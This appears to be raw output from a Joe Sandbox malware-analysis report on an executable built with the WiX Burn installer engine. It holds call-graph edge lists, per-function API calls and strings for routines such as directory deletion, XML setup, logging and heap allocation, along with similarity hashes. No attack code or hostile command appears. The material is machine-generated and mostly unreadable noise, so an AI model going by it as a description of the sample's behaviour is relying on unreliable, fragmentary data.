49285->49283 49302 8e367f GetProcessHeap RtlFreeHeap GetLastError 49285->49302 49287 8e48d6 49286->49287 49288 8e4951 49286->49288 49290 8e37f3 2 API calls 49287->49290 49289 8e29c8 52 API calls 49288->49289 49291 8e48e1 49289->49291 49290->49291 49292 8e4901 GetSystemDirectoryW 49291->49292 49295 8e48e7 49291->49295 49293 8e497a 49292->49293 49294 8e4910 GetLastError 49292->49294 49297 8e29c8 52 API calls 49293->49297 49301 8e49e4 49293->49301 49294->49295 49295->49278 49296 8e3cfd 52 API calls 49296->49295 49298 8e4986 49297->49298 49298->49295 49299 8e499d GetSystemDirectoryW 49298->49299 49300 8e49aa GetLastError 49299->49300 49299->49301 49300->49295 49301->49295 49301->49296 49302->49283 49303->49068 49304->49071 49305->49073 49306->49075 49307->49077 49308->49079 49309->49081 49315 939a4d 49310->49315 49312 93a069 49312->49090 49313->49093 49314->49098 49316 939ad0 49315->49316 49317 939a69 49315->49317 49325 8e540b GetProcessHeap RtlAllocateHeap 49316->49325 49323 8e593a GetProcessHeap HeapSize 49317->49323 49320 939a74 49321 939a7a 49320->49321 49324 8e56c2 GetProcessHeap HeapReAlloc 49320->49324 49321->49312 49323->49320 49324->49321 49325->49321 49328 8fb9f9 49326->49328 49327 8fba48 49331 8fba54 49327->49331 49506 8e367f GetProcessHeap RtlFreeHeap GetLastError 49327->49506 49328->49327 49505 8e367f GetProcessHeap RtlFreeHeap GetLastError 49328->49505 49331->49119 49333 8f0598 49332->49333 49335 8e783d DeleteCriticalSection 49332->49335 49337 8f05bf 49333->49337 49507 8e367f GetProcessHeap RtlFreeHeap GetLastError 49333->49507 49334 8e55c9 3 API calls 49334->49335 49338 8f5739 49335->49338 49337->49334 49339 8f574e 49338->49339 49340 8f5746 49338->49340 49342 8f003c 3 API calls 49339->49342 49508 8e367f GetProcessHeap RtlFreeHeap GetLastError 49340->49508 49343 8f5754 _memcpy_s 49342->49343 49343->49127 49345 8ee965 49344->49345 49346 8e7862 49344->49346 49348 8e367f GetProcessHeap RtlFreeHeap GetLastError 49345->49348 49349 8ee9ab 49345->49349 49350 
901a5b 49346->49350 49347 8e55c9 3 API calls 49347->49346 49348->49345 49349->49347 49351 8e786e 49350->49351 49352 901a67 49350->49352 49354 8f6e65 49351->49354 49509 94542a GetProcessHeap RtlFreeHeap GetLastError 49352->49509 49510 8f5d86 49354->49510 49358 8f6e83 _memcpy_s 49358->49133 49360 8ec086 49359->49360 49361 8e7886 49359->49361 49363 8ec0bc 49360->49363 49585 8e367f GetProcessHeap RtlFreeHeap GetLastError 49360->49585 49586 90dcae GetProcessHeap RtlFreeHeap GetLastError GetProcessHeap HeapSize 49360->49586 49366 8f27a8 49361->49366 49362 8e55c9 3 API calls 49362->49361 49363->49362 49367 8e7892 49366->49367 49370 8f27bb 49366->49370 49372 8f9cf3 49367->49372 49368 8f2877 49369 8e55c9 3 API calls 49368->49369 49369->49367 49370->49368 49371 8e367f GetProcessHeap RtlFreeHeap GetLastError 49370->49371 49371->49370 49373 8f9d0a 49372->49373 49374 8f9d02 49372->49374 49376 8f9d18 49373->49376 49598 8e367f GetProcessHeap RtlFreeHeap GetLastError 49373->49598 49597 8e367f GetProcessHeap RtlFreeHeap GetLastError 49374->49597 49378 8f9d37 49376->49378 49599 8e367f GetProcessHeap RtlFreeHeap GetLastError 49376->49599 49379 8f9d44 49378->49379 49382 8e55c9 3 API calls 49378->49382 49380 8f9d61 49379->49380 49600 8e367f GetProcessHeap RtlFreeHeap GetLastError 49379->49600 49383 8f9d6e 49380->49383 49385 8e55c9 3 API calls 49380->49385 49382->49379 49386 8f9d8b 49383->49386 49601 8e367f GetProcessHeap RtlFreeHeap GetLastError 49383->49601 49385->49383 49387 8f9d98 49386->49387 49390 8e55c9 3 API calls 49386->49390 49388 8f9db5 49387->49388 49602 8e367f GetProcessHeap RtlFreeHeap GetLastError 49387->49602 49391 8f9dc2 49388->49391 49393 8e55c9 3 API calls 49388->49393 49390->49387 49394 8f9dcf 49391->49394 49603 8e367f GetProcessHeap RtlFreeHeap GetLastError 49391->49603 49393->49391 49396 8f9ddc 49394->49396 49604 8e367f GetProcessHeap RtlFreeHeap GetLastError 49394->49604 49398 8f9de9 49396->49398 49605 8e367f GetProcessHeap RtlFreeHeap GetLastError 49396->49605 
49399 8f9df6 49398->49399 49606 8e367f GetProcessHeap RtlFreeHeap GetLastError 49398->49606 49402 8f9e03 49399->49402 49607 8e367f GetProcessHeap RtlFreeHeap GetLastError 49399->49607 49404 8f9e10 49402->49404 49608 8e367f GetProcessHeap RtlFreeHeap GetLastError 49402->49608 49406 8f9e1d 49404->49406 49609 8e367f GetProcessHeap RtlFreeHeap GetLastError 49404->49609 49408 8f9e2a 49406->49408 49610 8e367f GetProcessHeap RtlFreeHeap GetLastError 49406->49610 49409 8f9e37 49408->49409 49611 8e367f GetProcessHeap RtlFreeHeap GetLastError 49408->49611 49412 8f9e44 49409->49412 49612 8e367f GetProcessHeap RtlFreeHeap GetLastError 49409->49612 49414 8f9e51 49412->49414 49613 8e367f GetProcessHeap RtlFreeHeap GetLastError 49412->49613 49416 8f9e5e 49414->49416 49614 8e367f GetProcessHeap RtlFreeHeap GetLastError 49414->49614 49418 8f9e6b 49416->49418 49615 8e367f GetProcessHeap RtlFreeHeap GetLastError 49416->49615 49420 8f9e78 49418->49420 49616 8e367f GetProcessHeap RtlFreeHeap GetLastError 49418->49616 49422 8f9e85 49420->49422 49617 8e367f GetProcessHeap RtlFreeHeap GetLastError 49420->49617 49424 8f9e95 49422->49424 49618 8e367f GetProcessHeap RtlFreeHeap GetLastError 49422->49618 49426 8f9ea5 49424->49426 49619 8e367f GetProcessHeap RtlFreeHeap GetLastError 49424->49619 49428 8f9eb5 49426->49428 49620 8e367f GetProcessHeap RtlFreeHeap GetLastError 49426->49620 49430 8f9ec5 49428->49430 49621 8e367f GetProcessHeap RtlFreeHeap GetLastError 49428->49621 49431 8f9ed5 49430->49431 49622 8e367f GetProcessHeap RtlFreeHeap GetLastError 49430->49622 49434 8f9ee5 49431->49434 49623 8e367f GetProcessHeap RtlFreeHeap GetLastError 49431->49623 49446 8f9ef5 49434->49446 49624 8e367f GetProcessHeap RtlFreeHeap GetLastError 49434->49624 49437 8f9f76 49438 8f9f88 49437->49438 49625 8e367f GetProcessHeap RtlFreeHeap GetLastError 49437->49625 49441 8f9f98 49438->49441 49626 8e367f GetProcessHeap RtlFreeHeap GetLastError 49438->49626 49439 8f9f6e 49442 8e55c9 3 API calls 49439->49442 
49587 91022a 49441->49587 49442->49437 49446->49437 49446->49439 49448 8e367f GetProcessHeap RtlFreeHeap GetLastError 49446->49448 49447 8f9fba _memcpy_s 49447->49139 49448->49446 49451 8f0070 49450->49451 49457 8f0049 49450->49457 49453 8e78aa 49451->49453 49631 944b0d GetProcessHeap RtlFreeHeap GetLastError 49451->49631 49452 8f0067 49455 8e55c9 3 API calls 49452->49455 49458 8f6ce3 49453->49458 49455->49451 49457->49452 49630 8ef6ce GetProcessHeap RtlFreeHeap GetLastError 49457->49630 49463 8f6d4d 49458->49463 49473 8f6cf5 49458->49473 49459 8f6d45 49460 8e55c9 3 API calls 49459->49460 49460->49463 49461 8f6d72 49465 8e55c9 3 API calls 49461->49465 49462 8f6dab 49464 8f6db9 49462->49464 49469 8e55c9 3 API calls 49462->49469 49463->49461 49468 8f5d86 3 API calls 49463->49468 49471 8f6d7d 49463->49471 49470 8e78b6 49464->49470 49474 8e55c9 3 API calls 49464->49474 49465->49471 49466 8f6da3 49467 8e55c9 3 API calls 49466->49467 49467->49462 49468->49463 49469->49464 49476 8ee406 49470->49476 49471->49462 49471->49466 49632 8e367f GetProcessHeap RtlFreeHeap GetLastError 49471->49632 49472 8e367f GetProcessHeap RtlFreeHeap GetLastError 49472->49473 49473->49459 49473->49472 49474->49470 49477 8ee413 49476->49477 49479 8ee41b _memcpy_s 49476->49479 49478 8e55c9 3 API calls 49477->49478 49478->49479 49479->49145 49481 8e78cb 49480->49481 49485 8ef404 49480->49485 49481->49148 49490 8e367f GetProcessHeap RtlFreeHeap GetLastError 49481->49490 49482 8ef4c5 49483 8e55c9 3 API calls 49482->49483 49483->49481 49484 8e55c9 3 API calls 49484->49485 49485->49482 49485->49484 49486 8e367f GetProcessHeap RtlFreeHeap GetLastError 49485->49486 49633 944b0d GetProcessHeap RtlFreeHeap GetLastError 49485->49633 49486->49485 49488->49110 49489->49122 49490->49148 49491->49150 49492->49151 49493->49154 49494->49156 49495->49158 49496->49160 49497->49161 49498->49164 49499->49166 49500->49168 49501->49170 49502->49172 49503->49174 49504->49176 49505->49327 49506->49331 49507->49333 
49508->49339 49509->49351 49511 8f5d99 49510->49511 49512 8f5d92 49510->49512 49513 8f5da7 49511->49513 49566 8e367f GetProcessHeap RtlFreeHeap GetLastError 49511->49566 49565 8e367f GetProcessHeap RtlFreeHeap GetLastError 49512->49565 49516 8f5db5 49513->49516 49567 8e367f GetProcessHeap RtlFreeHeap GetLastError 49513->49567 49518 8f5dc3 49516->49518 49568 8e367f GetProcessHeap RtlFreeHeap GetLastError 49516->49568 49520 8f5dd1 49518->49520 49569 8e367f GetProcessHeap RtlFreeHeap GetLastError 49518->49569 49522 8f5ddf 49520->49522 49570 8e367f GetProcessHeap RtlFreeHeap GetLastError 49520->49570 49524 8f5ded 49522->49524 49571 8e367f GetProcessHeap RtlFreeHeap GetLastError 49522->49571 49535 8f5e2c 49524->49535 49543 8f5e1f 49524->49543 49572 901a7d GetProcessHeap RtlFreeHeap GetLastError _memcpy_s 49524->49572 49526 8f5e3d 49529 8f5e7c 49526->49529 49530 8f5e48 49526->49530 49527 8e55c9 3 API calls 49527->49535 49528 8e55c9 3 API calls 49528->49526 49577 911292 GetProcessHeap RtlFreeHeap GetLastError _memcpy_s 49529->49577 49532 8f5e4d 49530->49532 49533 8f5e74 49530->49533 49537 8f5e6c 49532->49537 49538 8f5e52 49532->49538 49576 9130b4 GetProcessHeap RtlFreeHeap GetLastError _memcpy_s 49533->49576 49535->49526 49535->49528 49536 8f5e62 49549 8f5e93 49536->49549 49575 916705 GetProcessHeap RtlFreeHeap GetLastError _memcpy_s 49537->49575 49541 8f5e57 49538->49541 49542 8f5e64 49538->49542 49541->49536 49573 919e34 GetProcessHeap RtlFreeHeap GetLastError 49541->49573 49574 9191ab GetProcessHeap RtlFreeHeap GetLastError 49542->49574 49543->49527 49545 8f5e8e 49545->49358 49548 8e367f GetProcessHeap RtlFreeHeap GetLastError 49545->49548 49548->49358 49550 8f5ea8 49549->49550 49551 8f5ea0 49549->49551 49554 8f5eb6 49550->49554 49579 8e367f GetProcessHeap RtlFreeHeap GetLastError 49550->49579 49578 8e367f GetProcessHeap RtlFreeHeap GetLastError 49551->49578 49555 8f5ec4 49554->49555 49580 8e367f GetProcessHeap RtlFreeHeap GetLastError 49554->49580 49557 8f5ed2 
49555->49557 49581 8e367f GetProcessHeap RtlFreeHeap GetLastError 49555->49581 49558 8f5ee0 49557->49558 49582 8e367f GetProcessHeap RtlFreeHeap GetLastError 49557->49582 49561 8f5f02 _memcpy_s 49558->49561 49562 8f5ef4 49558->49562 49583 8e367f GetProcessHeap RtlFreeHeap GetLastError 49558->49583 49561->49545 49562->49561 49584 9415b5 GetProcessHeap RtlFreeHeap GetLastError 49562->49584 49565->49511 49566->49513 49567->49516 49568->49518 49569->49520 49570->49522 49571->49524 49572->49524 49573->49536 49574->49536 49575->49536 49576->49536 49577->49536 49578->49550 49579->49554 49580->49555 49581->49557 49582->49558 49583->49562 49584->49561 49585->49360 49586->49360 49588 9102c8 49587->49588 49593 91023e 49587->49593 49589 8f9fa4 49588->49589 49591 8e55c9 3 API calls 49588->49591 49589->49447 49627 94542a GetProcessHeap RtlFreeHeap GetLastError 49589->49627 49590 9102bf 49592 8e55c9 3 API calls 49590->49592 49591->49589 49592->49588 49593->49590 49594 8f5d86 3 API calls 49593->49594 49628 8ef6ce GetProcessHeap RtlFreeHeap GetLastError 49593->49628 49629 8e367f GetProcessHeap RtlFreeHeap GetLastError 49593->49629 49594->49593 49597->49373 49598->49376 49599->49376 49600->49379 49601->49383 49602->49387 49603->49394 49604->49396 49605->49398 49606->49399 49607->49402 49608->49404 49609->49406 49610->49408 49611->49409 49612->49412 49613->49414 49614->49416 49615->49418 49616->49420 49617->49422 49618->49424 49619->49426 49620->49428 49621->49430 49622->49431 49623->49434 49624->49446 49625->49438 49626->49441 49627->49447 49628->49593 49629->49593 49630->49457 49631->49453 49632->49471 49633->49485 49635 93ac4a 49634->49635 49636 93ac3f 49634->49636 49637 93ac71 49635->49637 49646 8e367f GetProcessHeap RtlFreeHeap GetLastError 49635->49646 49636->49635 49645 93aed3 76 API calls 49636->49645 49639 93ac87 49637->49639 49647 8e367f GetProcessHeap RtlFreeHeap GetLastError 49637->49647 49639->49182 49639->49183 49642->49187 49643->49188 49644->49186 49645->49635 
49646->49637 49647->49639 50797 8f5180 5 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 50798 923582 SetThreadExecutionState 50803 94ad80 CompareStringOrdinal GetLastError 50804 8e6999 EnterCriticalSection LeaveCriticalSection 49668 93a58b 49669 8e1839 68 API calls 49668->49669 49670 93a59c 49669->49670 49671 93a5a2 GetProcAddress GetProcAddress 49670->49671 49672 93a5d0 49670->49672 49671->49672 49673 93a5fb 49672->49673 49674 8e1839 68 API calls 49672->49674 49675 93a5f5 49674->49675 49675->49673 49676 93a619 GetProcAddress 49675->49676 49677 93a677 GetProcAddress 49676->49677 49678 93a638 49676->49678 49677->49673 49679 93a696 49677->49679 49678->49677 49680 93a63c GetLastError 49678->49680 49679->49673 49681 93a69a GetLastError 49679->49681 49682 93a648 49680->49682 49681->49682 49682->49673 49685 8e7d90 261 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 49686 94058b 49687 940599 CoInitialize 49686->49687 49691 9405ab 49686->49691 49687->49691 49688 9405df CLSIDFromProgID 49689 9405f4 CLSIDFromProgID 49688->49689 49690 9405af 49688->49690 49689->49690 49691->49688 49691->49690 50806 92e18d 44 API calls __freea 50808 94c1b1 16 API calls ___delayLoadHelper2@8 50812 8e97a0 67 API calls 50813 9061a0 58 API calls 50814 90fba1 CompareStringW CompareStringOrdinal GetLastError 50815 9305a0 15 API calls 2 library calls 50605 93f5a7 50606 8e18c0 62 API calls 50605->50606 50607 93f5c3 50606->50607 50608 93f5c9 50607->50608 50630 943be0 50607->50630 50615 93f74e 50608->50615 50642 8e367f GetProcessHeap RtlFreeHeap GetLastError 50608->50642 50610 93f5fc GetProcAddress 50611 93f620 GetProcAddress 50610->50611 50612 93f61b 50610->50612 50613 93f644 GetProcAddress 50611->50613 50614 93f63f 50611->50614 50612->50611 50616 93f663 50613->50616 50617 93f668 GetProcAddress 50613->50617 50614->50613 50616->50617 50619 93f687 

Control-flow Graph (control_flow_graph 194, first block 8e5c81-8e5cf2; legend: Executed / Not Executed)
APIs
• GetFileAttributesW.KERNELBASE(?,?,?,?,?,00000000,00000001), ref: 008E5CE9
• GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 008E5CF4
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,00000000,00000001), ref: 008E5D73
• GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 008E5D7D
• FindFirstFileW.KERNELBASE(?,?,?,*.*,?,?,?,?,?,00000000,00000001), ref: 008E5E67
• GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 008E5E78
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,00000105,?,00000104,00000000,00000000,00000A00,?,?,?,?), ref: 008E5FC5
• GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 008E5FCF
• DeleteFileW.KERNELBASE(?,?,?,?,?,00000105,?,00000104,00000000,00000000,00000A00,?,?,?,?,00000000), ref: 008E6011
• MoveFileExW.KERNEL32(?,?,00000001,?,DEL,00000000,?,?,?,?,?,00000000,00000001), ref: 008E6056
• MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,?,00000000,00000001), ref: 008E606A
• GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 008E607A
• FindNextFileW.KERNELBASE(000000FF,?,?,?,?,?,00000105,?,00000104,00000000,00000000,00000A00,?,?,?,?), ref: 008E60BF
• GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 008E614D
• RemoveDirectoryW.KERNELBASE(?,?,?,?,?,00000000,00000001), ref: 008E615F
• GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 008E616D
• MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,?,00000000,00000001), ref: 008E6195
• FindClose.KERNEL32(000000FF,?,?,?,?,d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp,00000149,8000FFFF,?,?,?,?,00000000,00000001), ref: 008E62B0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
Similarity
• API ID: File$ErrorLast$AttributesFindMove$CloseDeleteDirectoryFirstNextRemove
• String ID: *.*$DEL$Directory delete cannot delete file: %ls$Failed to concat filename '%ls' to directory: %ls$Failed to concat wild cards to string: %ls$Failed to delete file: %ls$Failed to delete subdirectory; continuing: %ls$Failed to ensure file name was null terminated.$Failed to ensure path is backslash terminated: %ls$Failed to get attributes for path: %ls$Failed to get temp directory.$Failed to get temp file to move to.$Failed to remove attributes from file: %ls$Failed to remove directory: %ls$Failed to remove read-only attribute from path: %ls$Failed while looping through files in directory: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp$failed to get first file in directory: %ls
• API String ID: 3695804116-305978383
• Opcode ID: b774ba4d7644364803ffa11639a60f37e3d8332451e6ad26e81a4cdff08973fb
• Instruction ID: 3ff74293b34fee02c64116ea2bb587413a02bc8c4dfed4ae3f2bb15dd9cd5d5e
• Opcode Fuzzy Hash: b774ba4d7644364803ffa11639a60f37e3d8332451e6ad26e81a4cdff08973fb
• Instruction Fuzzy Hash: 5EF13972E406B976EB3156268C0AFAE6568FB53B68F014194FF04FA1D1F6B08D80CB95

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,008E7DDB,?,00940662,00000000,008E7D5B,00000000,?,?,009040B9,?,?,008E7D5B,?), ref: 0093FE1F
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00940662,00000000,008E7D5B,00000000,?,?,009040B9,?,?,008E7D5B,?,?,?,?,?), ref: 0093FE2B
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0093FEAC
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0093FEBC
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 0093FECB
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 0093FED9
                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(0097D6D8,00000000,00000001,0094E8F8,008E7D5B,?,00940662,00000000,008E7D5B,00000000,?,?,009040B9,?,?,008E7D5B), ref: 0093FF2B
                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00940034
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
                                                                                                                                                                                                                                                                            • String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed XmlCreateElement$failed appendChild$failed to create XML DOM Document$failed to get handle to kernel32.dll$kernel32.dll
                                                                                                                                                                                                                                                                            • API String ID: 2124981135-1573969316
                                                                                                                                                                                                                                                                            • Opcode ID: d6f5c3999ba31702e2e640118ececbddcb40ae7615f33020cfa13c18a399abfa
                                                                                                                                                                                                                                                                            • Instruction ID: c4800fe94b873ceb93ba3ff3ce47197b13eb0a3558912c905a5faa10dd89bab1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d6f5c3999ba31702e2e640118ececbddcb40ae7615f33020cfa13c18a399abfa
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD61BE35E40315ABDB259F648C59F6E7BA8FF86B00F114069F909E7291DB708D41DF50
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0097D4F0,00000000,00000000,--- logging level: %hs ---,00971670,00000000,?,008E7B05,00000003), ref: 0093A833
                                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(00000000,?,008E7B05,00000003), ref: 0093A843
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0093A84C
                                                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(008E7B05,?,008E7B05,00000003), ref: 0093A862
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(0097D4F0,?,?,?,00000000,0000FDE9,?,008E7B05,00000003), ref: 0093A9CB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to write string to log using default function: %ls, xrefs: 0093A9AA
                                                                                                                                                                                                                                                                            • Failed to format line prefix., xrefs: 0093A914
                                                                                                                                                                                                                                                                            • Failed to write string to log using redirected function: %ls, xrefs: 0093A98A
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\logutil.cpp, xrefs: 0093A923, 0093A9B9
                                                                                                                                                                                                                                                                            • Failed to convert log string to UTF-8, xrefs: 0093A955
                                                                                                                                                                                                                                                                            • %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 0093A8FF
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
                                                                                                                                                                                                                                                                            • String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls$Failed to convert log string to UTF-8$Failed to format line prefix.$Failed to write string to log using default function: %ls$Failed to write string to log using redirected function: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\logutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 296830338-1339504754
                                                                                                                                                                                                                                                                            • Opcode ID: f0f5861888e5101df4e170dec5c2678f12514fbb722c4de0ca018b996492e9b1
                                                                                                                                                                                                                                                                            • Instruction ID: 1254fab0e54146c518204414a6c99a4b36b1426a61dc38ddb978790f1553b5aa
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f0f5861888e5101df4e170dec5c2678f12514fbb722c4de0ca018b996492e9b1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C651C572E01219BBDB218BA9CC0AFBF77B8EF08B54F014015F944F6290D2749D41DBA2
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FormatMessageW.KERNEL32(00000900,?,?,00000000,00000002,00000000,00000000,00000000,?,?,0093B0B3,009050E1,?,?,00000000,00000001), ref: 0093A766
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0093B0B3,009050E1,?,?,00000000,00000001,?,008E812D,009050E1,?,00000000,?,?,009050E1,00000002), ref: 0093A772
                                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,009050E1,?,00000002,?,?,0093B0B3,009050E1,?,?,00000000,00000001,?,008E812D,009050E1,?), ref: 0093A7F8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                                                                                                                            • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\logutil.cpp$failed to log id: %d
                                                                                                                                                                                                                                                                            • API String ID: 1365068426-1219654922
                                                                                                                                                                                                                                                                            • Opcode ID: d2f626bade2e2397862eaad6787827fef7ace8d74caad995d49bb6c00727bdc1
                                                                                                                                                                                                                                                                            • Instruction ID: e3d10c406c61bfcda51891a7273b9f834d7beddf54a7754f6e79d46332bcd46f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2f626bade2e2397862eaad6787827fef7ace8d74caad995d49bb6c00727bdc1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7521C076A01129BFDB219F94DC86EAF3A7DEF85750F014019FE02A6161D7308E11EAA2
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DecryptFileW.ADVAPI32(?,00000000), ref: 008FEDF1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: DecryptFile
                                                                                                                                                                                                                                                                            • String ID: Failed to copy working folder.$No usable base working folder found.$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3257575229-4136860833
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(?,00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E541C
                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E5423
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1357844191-0

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
